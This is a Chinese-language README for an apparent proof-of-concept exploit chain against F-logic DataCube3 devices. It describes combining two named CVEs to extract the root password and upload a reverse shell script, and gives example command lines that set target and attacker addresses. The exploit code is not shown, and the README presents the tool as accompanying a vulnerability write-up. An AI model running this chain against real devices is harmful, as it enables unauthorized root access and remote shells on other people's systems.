本仓库提供了一个针对 DataCube3 设备的两步利用链概念验证(PoC)。它结合了 CVE-2024-25830(不当访问控制)来提取 root 密码,以及 CVE-2024-25832(无限制文件上传)来部署反向 Shell 脚本。该 PoC 补充了博文“DataCube3 漏洞报告”中的详细漏洞分析。
所有 F-logic DataCube3 设备版本 1.0。
# Usage: python datacube3.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python datacube3.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

仅供教育目的使用。